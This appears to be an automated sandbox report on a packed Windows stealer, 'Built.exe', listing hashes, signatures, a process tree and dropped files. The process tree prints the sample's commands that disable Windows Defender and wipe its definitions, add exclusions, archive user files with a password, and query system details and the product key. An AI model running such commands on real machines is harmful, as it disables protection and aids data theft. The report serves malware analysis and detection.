Analysis

  • max time kernel
    94s
  • max time network
    95s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20240508-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    27-06-2024 17:29

General

  • Target

    Built.exe

  • Size

    7.4MB

  • MD5

    66438a23be0dac1106efbca725c7be11

  • SHA1

    ab4f676bdf217b71e1b9aa1a41f4df0959930482

  • SHA256

    05d9aa0b53f7c998d325e3439319c85d1056dc9643fa2406599010fac741444b

  • SHA512

    cb783151b16649eb08882e329b10e36202e4303031f827507f03350474ede4b0a02c16a44716dcb625658cac9a3f9c2a63e919528a9aacf295991a9dba9e985e

  • SSDEEP

    196608:1Y8PiLjv+bhqNVoB0SEsucQZ41JBbIM11t5:W8PGL+9qz80SJHQK1Jx1v5

Score
8/10

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 17 IoCs
  • UPX packed file 51 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine the installed video card.

  • Suspicious behavior: EnumeratesProcesses 10 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 46 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Built.exe
    "C:\Users\Admin\AppData\Local\Temp\Built.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2264
    • C:\Users\Admin\AppData\Local\Temp\Built.exe
      "C:\Users\Admin\AppData\Local\Temp\Built.exe"
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1800
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2536
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2212
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:5116
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2044
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4968
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2572
          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
            "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\vizgkhtr\vizgkhtr.cmdline"
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:4528
            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
              C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5A84.tmp" "c:\Users\Admin\AppData\Local\Temp\vizgkhtr\CSCB92A0E1F939F48B381A2197FED496A13.TMP"
              6⤵
                PID:3464
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI22642\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\66H5N.zip" *"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3760
          • C:\Users\Admin\AppData\Local\Temp\_MEI22642\rar.exe
            C:\Users\Admin\AppData\Local\Temp\_MEI22642\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\66H5N.zip" *
            4⤵
            • Executes dropped EXE
            PID:1644
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "wmic os get Caption"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2936
          • C:\Windows\System32\Wbem\WMIC.exe
            wmic os get Caption
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:1732
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3544
          • C:\Windows\System32\Wbem\WMIC.exe
            wmic computersystem get totalphysicalmemory
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:1128
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3356
          • C:\Windows\System32\Wbem\WMIC.exe
            wmic csproduct get uuid
            4⤵
              PID:4916
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:1396
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              4⤵
              • Suspicious behavior: EnumeratesProcesses
              PID:4752
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:4316
            • C:\Windows\System32\Wbem\WMIC.exe
              wmic path win32_VideoController get name
              4⤵
              • Detects videocard installed
              PID:216
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:4388
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
              4⤵
              • Suspicious behavior: EnumeratesProcesses
              PID:2096

      Network

      MITRE ATT&CK Enterprise v15

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

        Filesize

        2KB

        MD5

        d85ba6ff808d9e5444a4b369f5bc2730

        SHA1

        31aa9d96590fff6981b315e0b391b575e4c0804a

        SHA256

        84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

        SHA512

        8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        944B

        MD5

        e448fe0d240184c6597a31d3be2ced58

        SHA1

        372b8d8c19246d3e38cd3ba123cc0f56070f03cd

        SHA256

        c660f0db85a1e7f0f68db19868979bf50bd541531babf77a701e1b1ce5e6a391

        SHA512

        0b7f7eae7700d32b18eee3677cb7f89b46ace717fa7e6b501d6c47d54f15dff7e12b49f5a7d36a6ffe4c16165c7d55162db4f3621db545b6af638035752beab4

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        1KB

        MD5

        4df4ef707a4d881224b023b119b108e2

        SHA1

        4e7043ec19dd7d0398b8d59db5f56e96f3c65fa1

        SHA256

        40b88b00fed4f927b1c8e77beffac4df496ef4f4c768ba8fb751a9cb415ece61

        SHA512

        54dc66e0cc4bddd984b849d99a505b9639f87bd4beaec4fc2301fbe128bb9168e9c43f2aeed1fa5828b8785ebc7d668c4b2fb1cfa2218f57fe59355d0511f669

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        64B

        MD5

        1a11402783a8686e08f8fa987dd07bca

        SHA1

        580df3865059f4e2d8be10644590317336d146ce

        SHA256

        9b1d1b468932a2d88548dc18504ac3066f8248079ecb083e919460bdb88398c0

        SHA512

        5f7f9f76d9d12a25fdc5b8d193391fb42c37515c657250fe01a9bfd9fe4cc4eab9d5ec254b2596ac1b9005f12511905f19fdae41f057062261d75bd83254b510

      • C:\Users\Admin\AppData\Local\Temp\66H5N.zip

        Filesize

        422KB

        MD5

        d635c445a5219552da7493859e175721

        SHA1

        4df81cc8f1dfbacc75f5fbf6c286d97c56569ae2

        SHA256

        28ec44d0f66fcdb0aa2b9eb07a013054fb19395ff8035a80f6c41e598963e5ed

        SHA512

        ba17006ae72f907b67bb40033c7733fd5c0fab29ae205cfe69d55ce71b64eb0f634c534b75009e668ccd59d55dc5a060f73079c738f53e56c7c40ec572dcb327

      • C:\Users\Admin\AppData\Local\Temp\RES5A84.tmp

        Filesize

        1KB

        MD5

        6eab79250b1c0fb6d75c26cfa040eaab

        SHA1

        1ca9e67ec28729e3c9f3241eed22bb9e1237de34

        SHA256

        d359289791295e75f194e960baf74246477aaf3f4c92a7922919d2bc1139a228

        SHA512

        0028a817c9f1cc1054961a6670f9d32d63d6b2d5679e01761dcd08e7050e81df5461196f9a224947f4a65e1f91d989e5e8937bfd350f595f870bd009eeaa951e

      • C:\Users\Admin\AppData\Local\Temp\_MEI22642\VCRUNTIME140.dll

        Filesize

        116KB

        MD5

        be8dbe2dc77ebe7f88f910c61aec691a

        SHA1

        a19f08bb2b1c1de5bb61daf9f2304531321e0e40

        SHA256

        4d292623516f65c80482081e62d5dadb759dc16e851de5db24c3cbb57b87db83

        SHA512

        0da644472b374f1da449a06623983d0477405b5229e386accadb154b43b8b083ee89f07c3f04d2c0c7501ead99ad95aecaa5873ff34c5eeb833285b598d5a655

      • C:\Users\Admin\AppData\Local\Temp\_MEI22642\_bz2.pyd

        Filesize

        48KB

        MD5

        341a6188f375c6702de4f9d0e1de8c08

        SHA1

        204a508ca6a13eb030ed7953595e9b79b9b9ba3b

        SHA256

        7039e1f1aef638c8dd8f8a4c55fd337219a4005dca2b557ba040171c27b02a1e

        SHA512

        5976f053ff865313e3b37b58ca053bc2778df03b8488bb0d47b0e08e1e7ba77ccf731b44335df0cea7428b976768bedc58540e68b54066a48fc4d8042e1d8a24

      • C:\Users\Admin\AppData\Local\Temp\_MEI22642\_ctypes.pyd

        Filesize

        58KB

        MD5

        ee2d4cd284d6bad4f207195bf5de727f

        SHA1

        781344a403bbffa0afb080942cd9459d9b05a348

        SHA256

        2b5fe7c399441ac2125f50106bc92a2d8f5e2668886c6de79452b82595fc4009

        SHA512

        a6b3ad33f1900132b2b8ff5b638cbe7725666761fc90d7f76fc835ecd31dfefc48d781b12b1e60779191888931bb167330492599c5fea8afa51e9c0f3d6e8e55

      • C:\Users\Admin\AppData\Local\Temp\_MEI22642\_decimal.pyd

        Filesize

        106KB

        MD5

        918e513c376a52a1046c4d4aee87042d

        SHA1

        d54edc813f56c17700252f487ef978bde1e7f7e1

        SHA256

        f9570f5d214d13446ed47811c7674e1d77c955c60b9fc7247ebcb64a32ae6b29

        SHA512

        ac2990a644920f07e36e4cb7af81aab82a503e579ce02d5026931631388e2091a52c12e4417e8c747f2af9aa9526b441a3f842387b5be534633c2258beeed497

      • C:\Users\Admin\AppData\Local\Temp\_MEI22642\_hashlib.pyd

        Filesize

        35KB

        MD5

        6d2132108825afd85763fc3b8f612b11

        SHA1

        af64b9b28b505e4eab1b8dd36f0ecf5511cc78a0

        SHA256

        aba69b3e817bfb164ffc7549c24b68addb1c9b88a970cf87bec99d856049ee52

        SHA512

        196bcf97034f1767a521d60423cca9d46a6447156f12f3eac5d1060a7fa26ac120c74c3ef1513e8750090d37531d014a48dd17db27fbfbb9c4768aa3aca6d5c0

      • C:\Users\Admin\AppData\Local\Temp\_MEI22642\_lzma.pyd

        Filesize

        86KB

        MD5

        5eee7d45b8d89c291965a153d86592ee

        SHA1

        93562dcdb10bd93433c7275d991681b299f45660

        SHA256

        7b5c5221d9db2e275671432f22e4dfca8fe8a07f6374fcfed15d9a3b2fdf07d9

        SHA512

        0d8f178ff5ef1e87aa4aae41089d063985c11544f85057e3860bcab1235f5ddb1cb582550a482c8b7eb961211fa67777e30b678294258ada27c423070ce8453e

      • C:\Users\Admin\AppData\Local\Temp\_MEI22642\_queue.pyd

        Filesize

        25KB

        MD5

        8b3ba5fb207d27eb3632486b936396a3

        SHA1

        5ad45b469041d88ec7fd277d84b1e2093ec7f93e

        SHA256

        9a1e7aaf48e313e55fc4817f1e7f0bfe0a985f30c024dcc8d28d67f8ff87a051

        SHA512

        18f5a0b1a384e328d07e59a5cefbc25e027adf24f336f5ec923e38064312ea259851167bc6bc0779e2d05cd39ddd8d16a2dfd15751c83ee58fda3b1187edc54b

      • C:\Users\Admin\AppData\Local\Temp\_MEI22642\_socket.pyd

        Filesize

        43KB

        MD5

        3ea95c5c76ea27ca44b7a55f6cfdcf53

        SHA1

        aace156795cfb6f418b6a68a254bb4adfc2afc56

        SHA256

        7367f5046980d3a76a6ddefc866b203cbaced9bb17f40ea834aed60bb5b65923

        SHA512

        916effbe6130a7b6298e1bd62e1e83e9d3defc6a7454b9044d953761b38808140a764ded97dcb1ab9d0fa7f05ae08c707da7af1c15f672a959ad84aa8da114c0

      • C:\Users\Admin\AppData\Local\Temp\_MEI22642\_sqlite3.pyd

        Filesize

        56KB

        MD5

        c9d6ffa3798bb5ae9f1b082d66901350

        SHA1

        25724fecf4369447e77283ece810def499318086

        SHA256

        410dad8d8b4ccf6f22701a2cdcb1bb5fd10d8efa97a21b1f5c7e1b8afc9f4fec

        SHA512

        878b10771303cb885039348fc7549338ad2ce609f4df6fff6588b079ab9efb624d6bc31474e806ad2a97785b30877b8241286276f36aab9e50a92cbf11adc448

      • C:\Users\Admin\AppData\Local\Temp\_MEI22642\_ssl.pyd

        Filesize

        65KB

        MD5

        936919f3509b2a913bf9e05723bc7cd2

        SHA1

        6bf9f1ecfcd71fc1634b2b70fcd567d220b1a6bd

        SHA256

        efce6dcf57915f23f10c75f6deaf6cb68efe87426caad4747ca908199b1f01e3

        SHA512

        2b2436e612b6cd60d794f843498fcbf8624a80e932d242592e569e32ec1d40a25d80e2c7e9f8edc7fc0478cef2ec6f77ad6c6ebbddf5afb027263397c91c73c3

      • C:\Users\Admin\AppData\Local\Temp\_MEI22642\base_library.zip

        Filesize

        1.4MB

        MD5

        81cd6d012885629791a9e3d9320c444e

        SHA1

        53268184fdbddf8909c349ed3c6701abe8884c31

        SHA256

        a18892e4f2f2ec0dee5714429f73a5add4e355d10a7ba51593afc730f77c51dd

        SHA512

        d5bf47fad8b1f5c7dcaa6bef5d4553e461f46e6c334b33d8adc93689cf89365c318f03e961a5d33994730b72dc8bde62209baca015d0d2d08a081d82df7dfd73

      • C:\Users\Admin\AppData\Local\Temp\_MEI22642\blank.aes

        Filesize

        113KB

        MD5

        2f0a9caf2e669729e2cdc3c7d2637827

        SHA1

        7920078cca3dde8b1de6f36036f60925748c5164

        SHA256

        2bcfb46899672a91dbf11c2b43f1e9cc9b9a21dd04419d3fc7c6c867476e571e

        SHA512

        419b56841987206628af698363341aab3ec7f42bb3b866e5b7c28ca4fedd597152f84035d3ec99c7e86db5cd21dd21cc794ce7076123d040cb4254c6ba218b0a

      • C:\Users\Admin\AppData\Local\Temp\_MEI22642\blank.aes

        Filesize

        113KB

        MD5

        3fbffaaf963eb9f9914580e6ce0efd85

        SHA1

        653986de252c710ebc40d23d4f081f99f918609a

        SHA256

        c87dbb44bbce9fd6f6e9b8e3f90a626153b61f884390495eaee4086db1461035

        SHA512

        7ed800ce5b4138f413914c27299b25b63f6c903eb66bb57283eee0715b82cf67b33bfa9c93214822100e9ea8209b2f13ae3251e477e5194db95f5a9215f835b3

      • C:\Users\Admin\AppData\Local\Temp\_MEI22642\libcrypto-3.dll

        Filesize

        1.6MB

        MD5

        27515b5bb912701abb4dfad186b1da1f

        SHA1

        3fcc7e9c909b8d46a2566fb3b1405a1c1e54d411

        SHA256

        fe80bd2568f8628032921fe7107bd611257ff64c679c6386ef24ba25271b348a

        SHA512

        087dfdede2a2e6edb3131f4fde2c4df25161bee9578247ce5ec2bce03e17834898eb8d18d1c694e4a8c5554ad41392d957e750239d3684a51a19993d3f32613c

      • C:\Users\Admin\AppData\Local\Temp\_MEI22642\libffi-8.dll

        Filesize

        29KB

        MD5

        08b000c3d990bc018fcb91a1e175e06e

        SHA1

        bd0ce09bb3414d11c91316113c2becfff0862d0d

        SHA256

        135c772b42ba6353757a4d076ce03dbf792456143b42d25a62066da46144fece

        SHA512

        8820d297aeda5a5ebe1306e7664f7a95421751db60d71dc20da251bcdfdc73f3fd0b22546bd62e62d7aa44dfe702e4032fe78802fb16ee6c2583d65abc891cbf

      • C:\Users\Admin\AppData\Local\Temp\_MEI22642\libssl-3.dll

        Filesize

        223KB

        MD5

        6eda5a055b164e5e798429dcd94f5b88

        SHA1

        2c5494379d1efe6b0a101801e09f10a7cb82dbe9

        SHA256

        377da6175c8a3815d164561350ae1df22e024bc84c55ae5d2583b51dfd0a19a8

        SHA512

        74283b4051751f9e4fd0f4b92ca4b953226c155fe4730d737d7ce41a563d6f212da770e96506d1713d8327d6fef94bae4528336ebcfb07e779de0e0f0cb31f2e

      • C:\Users\Admin\AppData\Local\Temp\_MEI22642\python311.dll

        Filesize

        1.6MB

        MD5

        76eb1ad615ba6600ce747bf1acde6679

        SHA1

        d3e1318077217372653be3947635b93df68156a4

        SHA256

        30be871735591ad96bc3fc7e541cdef474366159c2f7443feb30739cbd2db7e1

        SHA512

        2b960e74dd73f61d6a44fef0de9f2d50bcf2ec856b7aa5b97f0107e3cdadea461790760668a67db2ecaf71ff323133ee39ce2b38aafff3629c14e736d6a64aeb

      • C:\Users\Admin\AppData\Local\Temp\_MEI22642\rar.exe

        Filesize

        615KB

        MD5

        9c223575ae5b9544bc3d69ac6364f75e

        SHA1

        8a1cb5ee02c742e937febc57609ac312247ba386

        SHA256

        90341ac8dcc9ec5f9efe89945a381eb701fe15c3196f594d9d9f0f67b4fc2213

        SHA512

        57663e2c07b56024aaae07515ee3a56b2f5068ebb2f2dc42be95d1224376c2458da21c965aab6ae54de780cb874c2fc9de83d9089abf4536de0f50faca582d09

      • C:\Users\Admin\AppData\Local\Temp\_MEI22642\rarreg.key

        Filesize

        456B

        MD5

        4531984cad7dacf24c086830068c4abe

        SHA1

        fa7c8c46677af01a83cf652ef30ba39b2aae14c3

        SHA256

        58209c8ab4191e834ffe2ecd003fd7a830d3650f0fd1355a74eb8a47c61d4211

        SHA512

        00056f471945d838ef2ce56d51c32967879fe54fcbf93a237ed85a98e27c5c8d2a39bc815b41c15caace2071edd0239d775a31d1794dc4dba49e7ecff1555122

      • C:\Users\Admin\AppData\Local\Temp\_MEI22642\select.pyd

        Filesize

        25KB

        MD5

        2398a631bae547d1d33e91335e6d210b

        SHA1

        f1f10f901da76323d68a4c9b57f5edfd3baf30f5

        SHA256

        487fd8034efaf55106e9d04fc5d19fcd3e6449f45bc87a4f69189cd4ebb22435

        SHA512

        6568982977b8adb6ee04b777a976a2ecc3e4db1dffbd20004003a204eb5dae5980231c76c756d59a5309c2b1456cb63ab7671705a2c2e454c667642beb018c21

      • C:\Users\Admin\AppData\Local\Temp\_MEI22642\sqlite3.dll

        Filesize

        630KB

        MD5

        cc9d1869f9305b5a695fc5e76bd57b72

        SHA1

        c6a28791035e7e10cfae0ab51e9a5a8328ea55c1

        SHA256

        31cb4332ed49ce9b31500725bc667c427a5f5a2a304595beca14902ba7b7eeee

        SHA512

        e6c96c7c7665711608a1ba6563b7b4adb71d0bf23326716e34979166de65bc2d93cb85d0cb76475d55fd042da97df978f1423c099ad5fbeeaef8c3d5e0eb7be1

      • C:\Users\Admin\AppData\Local\Temp\_MEI22642\unicodedata.pyd

        Filesize

        295KB

        MD5

        6279c26d085d1b2efd53e9c3e74d0285

        SHA1

        bd0d274fb9502406b6b9a5756760b78919fa2518

        SHA256

        411bfb954b38ec4282d10cecb5115e29bffb0b0204ffe471a4b80777144b00f6

        SHA512

        30fdeed6380641fbb4d951d290a562c76dd44b59194e86f550a4a819f46a0deb7c7a2d94867cc367c41dcab9efb95628d65fe9a039c0e14a679c149148d82ac9

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jikzotj0.hkv.ps1

        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      • C:\Users\Admin\AppData\Local\Temp\vizgkhtr\vizgkhtr.dll

        Filesize

        4KB

        MD5

        61311a549dd04889d1e315ffdc61601e

        SHA1

        81b4deb95b7d93746aeba2e0c96935cc35534bff

        SHA256

        6df75ec9a0d76fd0ecdb89f1a31b701de2611a6d4a8da6a8ca4726745c259703

        SHA512

        04d506782cc182a3285c0046041461132b4147e659df65a58fccaeff18eb1c22f3753c34eea8a612f6cbf6a75525740cee4fb00b9fdf4feeb23a111c5b2ab0ae

      • C:\Users\Admin\AppData\Local\Temp\‏  ‌      \Display (1).png

        Filesize

        424KB

        MD5

        7b3461e8491164bdd816ea8870fd080f

        SHA1

        ee7b558dce7d5a56d8245cd56be15e60ddc35a0b

        SHA256

        06e2b22af9e909bb1de569da7546f25c08565a5a2ab2e697d55fb0c6ccbb45e8

        SHA512

        0b2d88b619ba0871a5099a004aeba0af3f11335424ef729b81a691a8ed5015dad87fddad4a1256ece6848fa4db860ed8ee49cbdd05ff98fd15f8d9b97acd5abf

      • \??\c:\Users\Admin\AppData\Local\Temp\vizgkhtr\CSCB92A0E1F939F48B381A2197FED496A13.TMP

        Filesize

        652B

        MD5

        7269aa5471e9d505b9e6073ef34fa5d5

        SHA1

        2c46f3a6246477273a43b83f7f0a26fc25bc1e9c

        SHA256

        191db485722bd1d655260cb99f15d90fb6b28691ddce97205e5654ab5b39372c

        SHA512

        e2a31775a225b66d01195d7a9a1f873c99febf76b1605a6b6bd0b80b0e1af0682b74c69753a5d3c2ef06d84c623263ab45b5e609e00f0d17a3b4b7dd8cab8954

      • \??\c:\Users\Admin\AppData\Local\Temp\vizgkhtr\vizgkhtr.0.cs

        Filesize

        1004B

        MD5

        c76055a0388b713a1eabe16130684dc3

        SHA1

        ee11e84cf41d8a43340f7102e17660072906c402

        SHA256

        8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

        SHA512

        22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

      • \??\c:\Users\Admin\AppData\Local\Temp\vizgkhtr\vizgkhtr.cmdline

        Filesize

        607B

        MD5

        f09233f46da051b61d3bc0d8d1568951

        SHA1

        d1f356ed49b9180719cf991a43b2c76670673d11

        SHA256

        6053a68b4ac32feeed201c8eba6798dfd29447e6dfda712d49b27fc9e29894c4

        SHA512

        899cb942b1f971ac32811f48ab6126051e37793ce35f3a89802955810fd99a751ccb2d8cd351ca936a56ba1a370842b8d4dfe6c8ee2f4383df0dc4f3ce7c218d

      • memory/1800-78-0x00007FF927600000-0x00007FF92760D000-memory.dmp

        Filesize

        52KB

      • memory/1800-136-0x00007FF9183F0000-0x00007FF918566000-memory.dmp

        Filesize

        1.5MB

      • memory/1800-73-0x00007FF92B120000-0x00007FF92B144000-memory.dmp

        Filesize

        144KB

      • memory/1800-77-0x00007FF9274A0000-0x00007FF9274B4000-memory.dmp

        Filesize

        80KB

      • memory/1800-81-0x00007FF917AF0000-0x00007FF917C0C000-memory.dmp

        Filesize

        1.1MB

      • memory/1800-80-0x00007FF92AF30000-0x00007FF92AF53000-memory.dmp

        Filesize

        140KB

      • memory/1800-171-0x00007FF917EC0000-0x00007FF9183E2000-memory.dmp

        Filesize

        5.1MB

      • memory/1800-74-0x00007FF917EC0000-0x00007FF9183E2000-memory.dmp

        Filesize

        5.1MB

      • memory/1800-69-0x00007FF927630000-0x00007FF9276FD000-memory.dmp

        Filesize

        820KB

      • memory/1800-68-0x00007FF926AA0000-0x00007FF92708E000-memory.dmp

        Filesize

        5.9MB

      • memory/1800-66-0x00007FF9278D0000-0x00007FF927903000-memory.dmp

        Filesize

        204KB

      • memory/1800-63-0x00007FF928140000-0x00007FF928159000-memory.dmp

        Filesize

        100KB

      • memory/1800-64-0x00007FF92B090000-0x00007FF92B09D000-memory.dmp

        Filesize

        52KB

      • memory/1800-60-0x00007FF9183F0000-0x00007FF918566000-memory.dmp

        Filesize

        1.5MB

      • memory/1800-58-0x00007FF92AF30000-0x00007FF92AF53000-memory.dmp

        Filesize

        140KB

      • memory/1800-174-0x00007FF917AF0000-0x00007FF917C0C000-memory.dmp

        Filesize

        1.1MB

      • memory/1800-56-0x00007FF92C650000-0x00007FF92C669000-memory.dmp

        Filesize

        100KB

      • memory/1800-54-0x00007FF92B0F0000-0x00007FF92B11D000-memory.dmp

        Filesize

        180KB

      • memory/1800-47-0x00007FF92B120000-0x00007FF92B144000-memory.dmp

        Filesize

        144KB

      • memory/1800-72-0x000001A49F180000-0x000001A49F6A2000-memory.dmp

        Filesize

        5.1MB

      • memory/1800-48-0x00007FF92FB80000-0x00007FF92FB8F000-memory.dmp

        Filesize

        60KB

      • memory/1800-159-0x00007FF928140000-0x00007FF928159000-memory.dmp

        Filesize

        100KB

      • memory/1800-160-0x00007FF926AA0000-0x00007FF92708E000-memory.dmp

        Filesize

        5.9MB

      • memory/1800-186-0x00007FF9274A0000-0x00007FF9274B4000-memory.dmp

        Filesize

        80KB

      • memory/1800-185-0x00007FF927600000-0x00007FF92760D000-memory.dmp

        Filesize

        52KB

      • memory/1800-184-0x00007FF927630000-0x00007FF9276FD000-memory.dmp

        Filesize

        820KB

      • memory/1800-183-0x00007FF9278D0000-0x00007FF927903000-memory.dmp

        Filesize

        204KB

      • memory/1800-182-0x00007FF928140000-0x00007FF928159000-memory.dmp

        Filesize

        100KB

      • memory/1800-181-0x00007FF9183F0000-0x00007FF918566000-memory.dmp

        Filesize

        1.5MB

      • memory/1800-180-0x00007FF92AF30000-0x00007FF92AF53000-memory.dmp

        Filesize

        140KB

      • memory/1800-179-0x00007FF92C650000-0x00007FF92C669000-memory.dmp

        Filesize

        100KB

      • memory/1800-178-0x00007FF92B0F0000-0x00007FF92B11D000-memory.dmp

        Filesize

        180KB

      • memory/1800-177-0x00007FF92FB80000-0x00007FF92FB8F000-memory.dmp

        Filesize

        60KB

      • memory/1800-176-0x00007FF92B120000-0x00007FF92B144000-memory.dmp

        Filesize

        144KB

      • memory/1800-175-0x00007FF92B090000-0x00007FF92B09D000-memory.dmp

        Filesize

        52KB

      • memory/1800-25-0x00007FF926AA0000-0x00007FF92708E000-memory.dmp

        Filesize

        5.9MB

      • memory/2044-82-0x00000279A0310000-0x00000279A0332000-memory.dmp

        Filesize

        136KB

      • memory/2572-127-0x0000022EC45E0000-0x0000022EC45E8000-memory.dmp

        Filesize

        32KB